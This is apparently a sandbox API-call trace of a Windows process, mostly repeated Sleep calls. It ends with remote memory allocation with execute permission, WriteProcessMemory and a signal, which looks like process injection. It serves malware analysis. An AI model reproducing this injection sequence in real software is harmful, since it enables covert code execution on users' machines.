	[0146.267] Sleep (dwMilliseconds=0xbb8) 
	[0146.283] Sleep (dwMilliseconds=0xbb8) 
	[0146.298] Sleep (dwMilliseconds=0xbb8) 
	[0146.313] Sleep (dwMilliseconds=0xbb8) 
	[0146.329] Sleep (dwMilliseconds=0xbb8) 
	[0146.369] Sleep (dwMilliseconds=0xbb8) 
	[0146.376] Sleep (dwMilliseconds=0xbb8) 
	[0146.391] Sleep (dwMilliseconds=0xbb8) 
	[0146.410] Sleep (dwMilliseconds=0xbb8) 
	[0146.422] Sleep (dwMilliseconds=0xbb8) 
	[0146.438] Sleep (dwMilliseconds=0xbb8) 
	[0146.454] Sleep (dwMilliseconds=0xbb8) 
	[0146.483] Sleep (dwMilliseconds=0xbb8) 
	[0146.485] Sleep (dwMilliseconds=0xbb8) 
	[0146.501] Sleep (dwMilliseconds=0xbb8) 
	[0146.516] Sleep (dwMilliseconds=0xbb8) 
	[0146.531] Sleep (dwMilliseconds=0xbb8) 
	[0146.548] Sleep (dwMilliseconds=0xbb8) 
	[0146.563] Sleep (dwMilliseconds=0xbb8) 
	[0146.578] Sleep (dwMilliseconds=0xbb8) 
	[0146.594] Sleep (dwMilliseconds=0xbb8) 
	[0146.610] Sleep (dwMilliseconds=0xbb8) 
	[0146.625] Sleep (dwMilliseconds=0xbb8) 
	[0146.655] Sleep (dwMilliseconds=0xbb8) 
	[0146.657] Sleep (dwMilliseconds=0xbb8) 
	[0146.672] Sleep (dwMilliseconds=0xbb8) 
	[0146.689] Sleep (dwMilliseconds=0xbb8) 
	[0146.703] Sleep (dwMilliseconds=0xbb8) 
	[0146.719] Sleep (dwMilliseconds=0xbb8) 
	[0146.735] Sleep (dwMilliseconds=0xbb8) 
	[0146.750] Sleep (dwMilliseconds=0xbb8) 
	[0146.765] Sleep (dwMilliseconds=0xbb8) 
	[0146.781] Sleep (dwMilliseconds=0xbb8) 
	[0146.797] Sleep (dwMilliseconds=0xbb8) 
	[0146.812] Sleep (dwMilliseconds=0xbb8) 
	[0146.829] Sleep (dwMilliseconds=0xbb8) 
	[0146.844] Sleep (dwMilliseconds=0xbb8) 
	[0146.859] Sleep (dwMilliseconds=0xbb8) 
	[0146.875] Sleep (dwMilliseconds=0xbb8) 
	[0146.890] Sleep (dwMilliseconds=0xbb8) 
	[0146.906] Sleep (dwMilliseconds=0xbb8) 
	[0146.922] Sleep (dwMilliseconds=0xbb8) 
	[0146.938] Sleep (dwMilliseconds=0xbb8) 
	[0146.953] Sleep (dwMilliseconds=0xbb8) 
	[0146.969] Sleep (dwMilliseconds=0xbb8) 
	[0146.984] Sleep (dwMilliseconds=0xbb8) 
	[0147.000] Sleep (dwMilliseconds=0xbb8) 
	[0147.017] Sleep (dwMilliseconds=0xbb8) 
	[0147.031] Sleep (dwMilliseconds=0xbb8) 
	[0147.047] Sleep (dwMilliseconds=0xbb8) 
	[0147.063] Sleep (dwMilliseconds=0xbb8) 
	[0147.078] Sleep (dwMilliseconds=0xbb8) 
	[0147.093] Sleep (dwMilliseconds=0xbb8) 
	[0147.109] Sleep (dwMilliseconds=0xbb8) 
	[0147.124] Sleep (dwMilliseconds=0xbb8) 
	[0147.140] Sleep (dwMilliseconds=0xbb8) 
	[0147.156] Sleep (dwMilliseconds=0xbb8) 
	[0147.171] Sleep (dwMilliseconds=0xbb8) 
	[0147.187] Sleep (dwMilliseconds=0xbb8) 
	[0147.202] Sleep (dwMilliseconds=0xbb8) 
	[0147.218] Sleep (dwMilliseconds=0xbb8) 
	[0147.234] Sleep (dwMilliseconds=0xbb8) 
	[0147.250] Sleep (dwMilliseconds=0xbb8) 
	[0147.265] Sleep (dwMilliseconds=0xbb8) 
	[0147.280] Sleep (dwMilliseconds=0xbb8) 
	[0147.296] Sleep (dwMilliseconds=0xbb8) 
	[0147.311] Sleep (dwMilliseconds=0xbb8) 
	[0147.327] Sleep (dwMilliseconds=0xbb8) 
	[0147.343] Sleep (dwMilliseconds=0xbb8) 
	[0147.358] Sleep (dwMilliseconds=0xbb8) 
	[0147.375] Sleep (dwMilliseconds=0xbb8) 
	[0147.390] Sleep (dwMilliseconds=0xbb8) 
	[0147.407] Sleep (dwMilliseconds=0xbb8) 
	[0147.421] Sleep (dwMilliseconds=0xbb8) 
	[0147.437] Sleep (dwMilliseconds=0xbb8) 
	[0147.452] Sleep (dwMilliseconds=0xbb8) 
	[0147.468] Sleep (dwMilliseconds=0xbb8) 
	[0147.495] Sleep (dwMilliseconds=0xbb8) 
	[0147.499] Sleep (dwMilliseconds=0xbb8) 
	[0147.514] Sleep (dwMilliseconds=0xbb8) 
	[0147.530] Sleep (dwMilliseconds=0xbb8) 
	[0147.545] Sleep (dwMilliseconds=0xbb8) 
	[0147.561] Sleep (dwMilliseconds=0xbb8) 
	[0147.577] Sleep (dwMilliseconds=0xbb8) 
	[0147.611] Sleep (dwMilliseconds=0xbb8) 
	[0147.623] Sleep (dwMilliseconds=0xbb8) 
	[0147.639] Sleep (dwMilliseconds=0xbb8) 
	[0147.662] Sleep (dwMilliseconds=0xbb8) 
	[0147.670] Sleep (dwMilliseconds=0xbb8) 
	[0147.686] Sleep (dwMilliseconds=0xbb8) 
	[0147.702] Sleep (dwMilliseconds=0xbb8) 
	[0147.718] Sleep (dwMilliseconds=0xbb8) 
	[0147.733] Sleep (dwMilliseconds=0xbb8) 
	[0147.751] Sleep (dwMilliseconds=0xbb8) 
	[0147.764] Sleep (dwMilliseconds=0xbb8) 
	[0147.780] Sleep (dwMilliseconds=0xbb8) 
	[0147.795] Sleep (dwMilliseconds=0xbb8) 
	[0147.811] Sleep (dwMilliseconds=0xbb8) 
	[0147.827] Sleep (dwMilliseconds=0xbb8) 
	[0147.842] Sleep (dwMilliseconds=0xbb8) 
	[0147.858] Sleep (dwMilliseconds=0xbb8) 
	[0147.873] Sleep (dwMilliseconds=0xbb8) 
	[0147.889] Sleep (dwMilliseconds=0xbb8) 
	[0147.904] Sleep (dwMilliseconds=0xbb8) 
	[0147.920] Sleep (dwMilliseconds=0xbb8) 
	[0147.936] Sleep (dwMilliseconds=0xbb8) 
	[0147.951] Sleep (dwMilliseconds=0xbb8) 
	[0147.970] Sleep (dwMilliseconds=0xbb8) 
	[0147.982] Sleep (dwMilliseconds=0xbb8) 
	[0147.998] Sleep (dwMilliseconds=0xbb8) 
	[0148.014] Sleep (dwMilliseconds=0xbb8) 
	[0148.030] Sleep (dwMilliseconds=0xbb8) 
	[0148.046] Sleep (dwMilliseconds=0xbb8) 
	[0148.060] Sleep (dwMilliseconds=0xbb8) 
	[0148.078] Sleep (dwMilliseconds=0xbb8) 
	[0148.092] Sleep (dwMilliseconds=0xbb8) 
	[0148.107] Sleep (dwMilliseconds=0xbb8) 
	[0148.123] Sleep (dwMilliseconds=0xbb8) 
	[0148.138] Sleep (dwMilliseconds=0xbb8) 
	[0148.156] Sleep (dwMilliseconds=0xbb8) 
	[0148.169] Sleep (dwMilliseconds=0xbb8) 
	[0148.185] Sleep (dwMilliseconds=0xbb8) 
	[0148.201] Sleep (dwMilliseconds=0xbb8) 
	[0148.216] Sleep (dwMilliseconds=0xbb8) 
	[0148.232] Sleep (dwMilliseconds=0xbb8) 
	[0148.248] Sleep (dwMilliseconds=0xbb8) 
	[0148.264] Sleep (dwMilliseconds=0xbb8) 
	[0148.279] Sleep (dwMilliseconds=0xbb8) 
	[0148.294] Sleep (dwMilliseconds=0xbb8) 
	[0148.310] Sleep (dwMilliseconds=0xbb8) 
	[0148.325] Sleep (dwMilliseconds=0xbb8) 
	[0148.341] Sleep (dwMilliseconds=0xbb8) 
	[0148.357] Sleep (dwMilliseconds=0xbb8) 
	[0148.376] Sleep (dwMilliseconds=0xbb8) 
	[0148.388] Sleep (dwMilliseconds=0xbb8) 
	[0148.405] Sleep (dwMilliseconds=0xbb8) 
	[0148.419] Sleep (dwMilliseconds=0xbb8) 
	[0148.435] Sleep (dwMilliseconds=0xbb8) 
	[0148.450] Sleep (dwMilliseconds=0xbb8) 
	[0148.466] Sleep (dwMilliseconds=0xbb8) 
	[0148.482] Sleep (dwMilliseconds=0xbb8) 
	[0148.497] Sleep (dwMilliseconds=0xbb8) 
	[0148.513] Sleep (dwMilliseconds=0xbb8) 
	[0148.529] Sleep (dwMilliseconds=0xbb8) 
	[0148.544] Sleep (dwMilliseconds=0xbb8) 
	[0148.560] Sleep (dwMilliseconds=0xbb8) 
	[0148.575] Sleep (dwMilliseconds=0xbb8) 
	[0148.591] Sleep (dwMilliseconds=0xbb8) 
	[0148.606] Sleep (dwMilliseconds=0xbb8) 
	[0148.622] Sleep (dwMilliseconds=0xbb8) 
	[0148.637] Sleep (dwMilliseconds=0xbb8) 
	[0148.661] Sleep (dwMilliseconds=0xbb8) 
	[0148.669] Sleep (dwMilliseconds=0xbb8) 
	[0148.684] Sleep (dwMilliseconds=0xbb8) 
	[0148.701] Sleep (dwMilliseconds=0xbb8) 
	[0148.716] Sleep (dwMilliseconds=0xbb8) 
	[0148.731] Sleep (dwMilliseconds=0xbb8) 
	[0148.747] Sleep (dwMilliseconds=0xbb8) 
	[0148.762] Sleep (dwMilliseconds=0xbb8) 
	[0148.780] Sleep (dwMilliseconds=0xbb8) 
	[0148.794] Sleep (dwMilliseconds=0xbb8) 
	[0148.810] Sleep (dwMilliseconds=0xbb8) 
	[0148.825] Sleep (dwMilliseconds=0xbb8) 
	[0148.841] Sleep (dwMilliseconds=0xbb8) 
	[0148.856] Sleep (dwMilliseconds=0xbb8) 
	[0148.872] Sleep (dwMilliseconds=0xbb8) 
	[0148.891] Sleep (dwMilliseconds=0xbb8) 
	[0148.905] Sleep (dwMilliseconds=0xbb8) 
	[0148.919] Sleep (dwMilliseconds=0xbb8) 
	[0148.934] Sleep (dwMilliseconds=0xbb8) 
	[0148.950] Sleep (dwMilliseconds=0xbb8) 
	[0148.965] Sleep (dwMilliseconds=0xbb8) 
	[0148.981] Sleep (dwMilliseconds=0xbb8) 
	[0148.999] Sleep (dwMilliseconds=0xbb8) 
	[0149.012] Sleep (dwMilliseconds=0xbb8) 
	[0149.029] Sleep (dwMilliseconds=0xbb8) 
	[0149.044] Sleep (dwMilliseconds=0xbb8) 
	[0149.059] Sleep (dwMilliseconds=0xbb8) 
	[0149.074] Sleep (dwMilliseconds=0xbb8) 
	[0149.090] Sleep (dwMilliseconds=0xbb8) 
	[0149.107] Sleep (dwMilliseconds=0xbb8) 
	[0149.121] Sleep (dwMilliseconds=0xbb8) 
	[0149.137] Sleep (dwMilliseconds=0xbb8) 
	[0149.156] Sleep (dwMilliseconds=0xbb8) 
	[0149.168] Sleep (dwMilliseconds=0xbb8) 
	[0149.183] Sleep (dwMilliseconds=0xbb8) 
	[0149.199] Sleep (dwMilliseconds=0xbb8) 
	[0149.215] Sleep (dwMilliseconds=0xbb8) 
	[0149.230] Sleep (dwMilliseconds=0xbb8) 
	[0149.246] Sleep (dwMilliseconds=0xbb8) 
	[0149.263] Sleep (dwMilliseconds=0xbb8) 
	[0149.277] Sleep (dwMilliseconds=0xbb8) 
	[0149.293] Sleep (dwMilliseconds=0xbb8) 
	[0149.308] Sleep (dwMilliseconds=0xbb8) 
	[0149.324] Sleep (dwMilliseconds=0xbb8) 
	[0149.340] Sleep (dwMilliseconds=0xbb8) 
	[0149.356] Sleep (dwMilliseconds=0xbb8) 
	[0149.371] Sleep (dwMilliseconds=0xbb8) 
	[0149.386] Sleep (dwMilliseconds=0xbb8) 
	[0149.433] Sleep (dwMilliseconds=0xbb8) 
	[0149.449] Sleep (dwMilliseconds=0xbb8) 
	[0149.465] Sleep (dwMilliseconds=0xbb8) 
	[0149.480] Sleep (dwMilliseconds=0xbb8) 
	[0149.506] Sleep (dwMilliseconds=0xbb8) 
	[0149.511] Sleep (dwMilliseconds=0xbb8) 
	[0149.527] Sleep (dwMilliseconds=0xbb8) 
	[0149.542] Sleep (dwMilliseconds=0xbb8) 
	[0149.558] Sleep (dwMilliseconds=0xbb8) 
	[0149.574] Sleep (dwMilliseconds=0xbb8) 
	[0149.589] Sleep (dwMilliseconds=0xbb8) 
	[0149.605] Sleep (dwMilliseconds=0xbb8) 
	[0149.620] Sleep (dwMilliseconds=0xbb8) 
	[0149.636] Sleep (dwMilliseconds=0xbb8) 
	[0149.659] Sleep (dwMilliseconds=0xbb8) 
	[0149.667] Sleep (dwMilliseconds=0xbb8) 
	[0149.683] Sleep (dwMilliseconds=0xbb8) 
	[0149.699] Sleep (dwMilliseconds=0xbb8) 
	[0149.715] Sleep (dwMilliseconds=0xbb8) 
	[0149.730] Sleep (dwMilliseconds=0xbb8) 
	[0149.745] Sleep (dwMilliseconds=0xbb8) 
	[0149.761] Sleep (dwMilliseconds=0xbb8) 
	[0149.776] Sleep (dwMilliseconds=0xbb8) 
	[0149.794] Sleep (dwMilliseconds=0xbb8) 
	[0149.808] Sleep (dwMilliseconds=0xbb8) 
	[0149.823] Sleep (dwMilliseconds=0xbb8) 
	[0149.839] Sleep (dwMilliseconds=0xbb8) 
	[0149.855] Sleep (dwMilliseconds=0xbb8) 
	[0149.870] Sleep (dwMilliseconds=0xbb8) 
	[0149.886] Sleep (dwMilliseconds=0xbb8) 
	[0149.902] Sleep (dwMilliseconds=0xbb8) 
	[0149.917] Sleep (dwMilliseconds=0xbb8) 
	[0149.932] Sleep (dwMilliseconds=0xbb8) 
	[0149.950] Sleep (dwMilliseconds=0xbb8) 
	[0149.964] Sleep (dwMilliseconds=0xbb8) 
	[0149.982] Sleep (dwMilliseconds=0xbb8) 
	[0149.995] Sleep (dwMilliseconds=0xbb8) 
	[0150.011] Sleep (dwMilliseconds=0xbb8) 
	[0150.026] Sleep (dwMilliseconds=0xbb8) 
	[0150.042] Sleep (dwMilliseconds=0xbb8) 
	[0150.057] Sleep (dwMilliseconds=0xbb8) 
	[0150.073] Sleep (dwMilliseconds=0xbb8) 
	[0150.089] Sleep (dwMilliseconds=0xbb8) 
	[0150.104] Sleep (dwMilliseconds=0xbb8) 
	[0150.120] Sleep (dwMilliseconds=0xbb8) 
	[0150.135] Sleep (dwMilliseconds=0xbb8) 
	[0150.151] Sleep (dwMilliseconds=0xbb8) 
	[0150.166] Sleep (dwMilliseconds=0xbb8) 
	[0150.182] Sleep (dwMilliseconds=0xbb8) 
	[0150.198] Sleep (dwMilliseconds=0xbb8) 
	[0150.213] Sleep (dwMilliseconds=0xbb8) 
	[0150.229] Sleep (dwMilliseconds=0xbb8) 
	[0150.244] Sleep (dwMilliseconds=0xbb8) 
	[0150.260] Sleep (dwMilliseconds=0xbb8) 
	[0150.276] Sleep (dwMilliseconds=0xbb8) 
	[0150.292] Sleep (dwMilliseconds=0xbb8) 
	[0150.307] Sleep (dwMilliseconds=0xbb8) 
	[0150.323] Sleep (dwMilliseconds=0xbb8) 
	[0150.339] Sleep (dwMilliseconds=0xbb8) 
	[0150.354] Sleep (dwMilliseconds=0xbb8) 
	[0150.369] Sleep (dwMilliseconds=0xbb8) 
	[0150.385] Sleep (dwMilliseconds=0xbb8) 
	[0150.421] Sleep (dwMilliseconds=0xbb8) 
	[0150.432] Sleep (dwMilliseconds=0xbb8) 
	[0150.447] Sleep (dwMilliseconds=0xbb8) 
	[0150.463] Sleep (dwMilliseconds=0xbb8) 
	[0150.478] Sleep (dwMilliseconds=0xbb8) 
	[0150.494] Sleep (dwMilliseconds=0xbb8) 
	[0150.520] Sleep (dwMilliseconds=0xbb8) 
	[0150.525] Sleep (dwMilliseconds=0xbb8) 
	[0150.541] Sleep (dwMilliseconds=0xbb8) 
	[0150.557] Sleep (dwMilliseconds=0xbb8) 
	[0150.572] Sleep (dwMilliseconds=0xbb8) 
	[0150.588] Sleep (dwMilliseconds=0xbb8) 
	[0150.603] Sleep (dwMilliseconds=0xbb8) 
	[0150.619] Sleep (dwMilliseconds=0xbb8) 
	[0150.634] Sleep (dwMilliseconds=0xbb8) 
	[0150.663] Sleep (dwMilliseconds=0xbb8) 
	[0150.665] Sleep (dwMilliseconds=0xbb8) 
	[0150.681] Sleep (dwMilliseconds=0xbb8) 
	[0150.697] Sleep (dwMilliseconds=0xbb8) 
	[0150.713] Sleep (dwMilliseconds=0xbb8) 
	[0150.728] Sleep (dwMilliseconds=0xbb8) 
	[0150.744] Sleep (dwMilliseconds=0xbb8) 
	[0150.760] Sleep (dwMilliseconds=0xbb8) 
	[0150.775] Sleep (dwMilliseconds=0xbb8) 
	[0150.790] Sleep (dwMilliseconds=0xbb8) 
	[0150.806] Sleep (dwMilliseconds=0xbb8) 
	[0150.823] Sleep (dwMilliseconds=0xbb8) 
	[0150.837] Sleep (dwMilliseconds=0xbb8) 
	[0150.853] Sleep (dwMilliseconds=0xbb8) 
	[0150.869] Sleep (dwMilliseconds=0xbb8) 
	[0150.884] Sleep (dwMilliseconds=0xbb8) 
	[0150.899] Sleep (dwMilliseconds=0xbb8) 
	[0150.915] Sleep (dwMilliseconds=0xbb8) 
	[0150.931] Sleep (dwMilliseconds=0xbb8) 
	[0150.946] Sleep (dwMilliseconds=0xbb8) 
	[0150.962] Sleep (dwMilliseconds=0xbb8) 
	[0150.979] Sleep (dwMilliseconds=0xbb8) 
	[0150.993] Sleep (dwMilliseconds=0xbb8) 
	[0151.009] Sleep (dwMilliseconds=0xbb8) 
	[0151.025] Sleep (dwMilliseconds=0xbb8) 
	[0151.040] Sleep (dwMilliseconds=0xbb8) 
	[0151.055] Sleep (dwMilliseconds=0xbb8) 
	[0151.071] Sleep (dwMilliseconds=0xbb8) 
	[0151.087] Sleep (dwMilliseconds=0xbb8) 
	[0151.102] Sleep (dwMilliseconds=0xbb8) 
	[0151.118] Sleep (dwMilliseconds=0xbb8) 
	[0151.133] Sleep (dwMilliseconds=0xbb8) 
	[0151.149] Sleep (dwMilliseconds=0xbb8) 
	[0151.165] Sleep (dwMilliseconds=0xbb8) 
	[0151.180] Sleep (dwMilliseconds=0xbb8) 
	[0151.200] Sleep (dwMilliseconds=0xbb8) 
	[0151.211] Sleep (dwMilliseconds=0xbb8) 
	[0151.227] Sleep (dwMilliseconds=0xbb8) 
	[0151.246] Sleep (dwMilliseconds=0xbb8) 
	[0151.258] Sleep (dwMilliseconds=0xbb8) 
	[0151.274] Sleep (dwMilliseconds=0xbb8) 
	[0151.289] Sleep (dwMilliseconds=0xbb8) 
	[0151.305] Sleep (dwMilliseconds=0xbb8) 
	[0151.323] Sleep (dwMilliseconds=0xbb8) 
	[0151.336] Sleep (dwMilliseconds=0xbb8) 
	[0151.352] Sleep (dwMilliseconds=0xbb8) 
	[0151.367] Sleep (dwMilliseconds=0xbb8) 
	[0151.383] Sleep (dwMilliseconds=0xbb8) 
	[0151.399] Sleep (dwMilliseconds=0xbb8) 
	[0151.432] Sleep (dwMilliseconds=0xbb8) 
	[0151.446] Sleep (dwMilliseconds=0xbb8) 
	[0151.461] Sleep (dwMilliseconds=0xbb8) 
	[0151.479] Sleep (dwMilliseconds=0xbb8) 
	[0151.492] Sleep (dwMilliseconds=0xbb8) 
	[0151.508] Sleep (dwMilliseconds=0xbb8) 
	[0151.526] Sleep (dwMilliseconds=0xbb8) 
	[0151.539] Sleep (dwMilliseconds=0xbb8) 
	[0151.555] Sleep (dwMilliseconds=0xbb8) 
	[0151.570] Sleep (dwMilliseconds=0xbb8) 
	[0151.586] Sleep (dwMilliseconds=0xbb8) 
	[0151.602] Sleep (dwMilliseconds=0xbb8) 
	[0151.617] Sleep (dwMilliseconds=0xbb8) 
	[0151.633] Sleep (dwMilliseconds=0xbb8) 
	[0151.659] Sleep (dwMilliseconds=0xbb8) 
	[0151.664] Sleep (dwMilliseconds=0xbb8) 
	[0151.679] Sleep (dwMilliseconds=0xbb8) 
	[0151.695] Sleep (dwMilliseconds=0xbb8) 
	[0151.711] Sleep (dwMilliseconds=0xbb8) 
	[0151.726] Sleep (dwMilliseconds=0xbb8) 
	[0151.742] Sleep (dwMilliseconds=0xbb8) 
	[0151.758] Sleep (dwMilliseconds=0xbb8) 
	[0151.773] Sleep (dwMilliseconds=0xbb8) 
	[0151.789] Sleep (dwMilliseconds=0xbb8) 
	[0151.804] Sleep (dwMilliseconds=0xbb8) 
	[0151.820] Sleep (dwMilliseconds=0xbb8) 
	[0151.836] Sleep (dwMilliseconds=0xbb8) 
	[0151.852] Sleep (dwMilliseconds=0xbb8) 
	[0151.867] Sleep (dwMilliseconds=0xbb8) 
	[0151.882] Sleep (dwMilliseconds=0xbb8) 
	[0151.898] Sleep (dwMilliseconds=0xbb8) 
	[0151.913] Sleep (dwMilliseconds=0xbb8) 
	[0151.929] Sleep (dwMilliseconds=0xbb8) 
	[0151.945] Sleep (dwMilliseconds=0xbb8) 
	[0151.961] Sleep (dwMilliseconds=0xbb8) 
	[0151.976] Sleep (dwMilliseconds=0xbb8) 
	[0151.991] Sleep (dwMilliseconds=0xbb8) 
	[0152.008] Sleep (dwMilliseconds=0xbb8) 
	[0152.023] Sleep (dwMilliseconds=0xbb8) 
	[0152.038] Sleep (dwMilliseconds=0xbb8) 
	[0152.054] Sleep (dwMilliseconds=0xbb8) 
	[0152.070] Sleep (dwMilliseconds=0xbb8) 
	[0152.085] Sleep (dwMilliseconds=0xbb8) 
	[0152.101] Sleep (dwMilliseconds=0xbb8) 
	[0152.117] Sleep (dwMilliseconds=0xbb8) 
	[0152.132] Sleep (dwMilliseconds=0xbb8) 
	[0152.151] Sleep (dwMilliseconds=0xbb8) 
	[0152.163] Sleep (dwMilliseconds=0xbb8) 
	[0152.179] Sleep (dwMilliseconds=0xbb8) 
	[0152.194] Sleep (dwMilliseconds=0xbb8) 
	[0152.210] Sleep (dwMilliseconds=0xbb8) 
	[0152.226] Sleep (dwMilliseconds=0xbb8) 
	[0152.241] Sleep (dwMilliseconds=0xbb8) 
	[0152.257] Sleep (dwMilliseconds=0xbb8) 
	[0152.273] Sleep (dwMilliseconds=0xbb8) 
	[0152.289] Sleep (dwMilliseconds=0xbb8) 
	[0152.309] Sleep (dwMilliseconds=0xbb8) 
	[0152.319] Sleep (dwMilliseconds=0xbb8) 
	[0152.335] Sleep (dwMilliseconds=0xbb8) 
	[0152.396] Sleep (dwMilliseconds=0xbb8) 
	[0152.397] Sleep (dwMilliseconds=0xbb8) 
	[0152.413] Sleep (dwMilliseconds=0xbb8) 
	[0152.439] Sleep (dwMilliseconds=0xbb8) 
	[0152.445] Sleep (dwMilliseconds=0xbb8) 
	[0152.460] Sleep (dwMilliseconds=0xbb8) 
	[0152.475] Sleep (dwMilliseconds=0xbb8) 
	[0152.491] Sleep (dwMilliseconds=0xbb8) 
	[0152.507] Sleep (dwMilliseconds=0xbb8) 
	[0152.530] Sleep (dwMilliseconds=0xbb8) 
	[0152.537] Sleep (dwMilliseconds=0xbb8) 
	[0152.553] Sleep (dwMilliseconds=0xbb8) 
	[0152.569] Sleep (dwMilliseconds=0xbb8) 
	[0152.584] Sleep (dwMilliseconds=0xbb8) 
	[0152.620] Sleep (dwMilliseconds=0xbb8) 
	[0152.631] Sleep (dwMilliseconds=0xbb8) 
	[0152.669] Sleep (dwMilliseconds=0xbb8) 
	[0152.678] Sleep (dwMilliseconds=0xbb8) 
	[0152.693] Sleep (dwMilliseconds=0xbb8) 
	[0152.712] Sleep (dwMilliseconds=0xbb8) 
	[0152.725] Sleep (dwMilliseconds=0xbb8) 
	[0152.741] Sleep (dwMilliseconds=0xbb8) 
	[0152.756] Sleep (dwMilliseconds=0xbb8) 
	[0152.772] Sleep (dwMilliseconds=0xbb8) 
	[0152.787] Sleep (dwMilliseconds=0xbb8) 
	[0152.803] Sleep (dwMilliseconds=0xbb8) 
	[0152.818] Sleep (dwMilliseconds=0xbb8) 
	[0152.835] Sleep (dwMilliseconds=0xbb8) 
	[0152.850] Sleep (dwMilliseconds=0xbb8) 
	[0152.865] Sleep (dwMilliseconds=0xbb8) 
	[0152.881] Sleep (dwMilliseconds=0xbb8) 
	[0152.897] Sleep (dwMilliseconds=0xbb8) 
	[0152.912] Sleep (dwMilliseconds=0xbb8) 
	[0152.928] Sleep (dwMilliseconds=0xbb8) 
	[0152.944] Sleep (dwMilliseconds=0xbb8) 
	[0152.960] Sleep (dwMilliseconds=0xbb8) 
	[0152.974] Sleep (dwMilliseconds=0xbb8) 
	[0152.993] Sleep (dwMilliseconds=0xbb8) 
	[0153.006] Sleep (dwMilliseconds=0xbb8) 
	[0153.021] Sleep (dwMilliseconds=0xbb8) 
	[0153.037] Sleep (dwMilliseconds=0xbb8) 
	[0153.053] Sleep (dwMilliseconds=0xbb8) 
	[0153.068] Sleep (dwMilliseconds=0xbb8) 
	[0153.084] Sleep (dwMilliseconds=0xbb8) 
	[0153.099] Sleep (dwMilliseconds=0xbb8) 
	[0153.115] Sleep (dwMilliseconds=0xbb8) 
	[0153.131] Sleep (dwMilliseconds=0xbb8) 
	[0153.146] Sleep (dwMilliseconds=0xbb8) 
	[0153.162] Sleep (dwMilliseconds=0xbb8) 
	[0153.177] Sleep (dwMilliseconds=0xbb8) 
	[0153.197] Sleep (dwMilliseconds=0xbb8) 
	[0153.209] Sleep (dwMilliseconds=0xbb8) 
	[0153.224] Sleep (dwMilliseconds=0xbb8) 
	[0153.240] Sleep (dwMilliseconds=0xbb8) 
	[0153.255] Sleep (dwMilliseconds=0xbb8) 
	[0153.272] Sleep (dwMilliseconds=0xbb8) 
	[0153.286] Sleep (dwMilliseconds=0xbb8) 
	[0153.302] Sleep (dwMilliseconds=0xbb8) 
	[0153.317] Sleep (dwMilliseconds=0xbb8) 
	[0153.337] Sleep (dwMilliseconds=0xbb8) 
	[0153.349] Sleep (dwMilliseconds=0xbb8) 
	[0153.364] Sleep (dwMilliseconds=0xbb8) 
	[0153.380] Sleep (dwMilliseconds=0xbb8) 
	[0153.427] Sleep (dwMilliseconds=0xbb8) 
	[0153.489] Sleep (dwMilliseconds=0xbb8) 
	[0153.536] Sleep (dwMilliseconds=0xbb8) 
	[0153.578] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306500
	[0153.578] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2306500) returned 1
	[0153.578] Sleep (dwMilliseconds=0xbb8) 
	[0153.781] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23079d8
	[0153.781] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23079d8) returned 1
	[0153.781] Sleep (dwMilliseconds=0xbb8) 
	[0153.816] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23079d8
	[0153.816] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23079d8) returned 1
	[0153.817] Sleep (dwMilliseconds=0xbb8) 
	[0153.902] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23079d8
	[0153.902] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23079d8) returned 1
	[0153.902] Sleep (dwMilliseconds=0xbb8) 
	[0153.942] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x24c2f8
	[0153.942] WaitForSingleObject (hHandle=0x450, dwMilliseconds=0x0) returned 0x0
	[0153.942] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x248fe6c | out: lpSystemTimeAsFileTime=0x248fe6c*(dwLowDateTime=0x45890360, dwHighDateTime=0x1d50a6a)) 
	[0153.942] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x24c708
	[0153.942] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x24c758
	[0153.942] lstrcmpiW (lpString1="systeminfo32", lpString2="systeminfo32") returned 0
	[0153.942] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x24c758) returned 1
	[0153.942] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x248fd70, nSize=0x70, lpNumberOfBytesRead=0x248fd50 | out: lpBuffer=0x248fd70*, lpNumberOfBytesRead=0x248fd50*=0x70) returned 1
	[0153.942] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x24c758
	[0153.942] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.942] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x24c758*, nSize=0x14, lpNumberOfBytesWritten=0x248fd48 | out: lpBuffer=0x24c758*, lpNumberOfBytesWritten=0x248fd48*=0x14) returned 1
	[0153.942] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x248fd70*, nSize=0x70, lpNumberOfBytesWritten=0x248fd48 | out: lpBuffer=0x248fd70*, lpNumberOfBytesWritten=0x248fd48*=0x70) returned 1
	[0153.943] ResetEvent (hEvent=0x268) returned 1
	[0153.943] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.943] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x248fd70, nSize=0x70, lpNumberOfBytesRead=0x248fd48 | out: lpBuffer=0x248fd70*, lpNumberOfBytesRead=0x248fd48*=0x70) returned 1
	[0153.943] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.943] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x24c758) returned 1
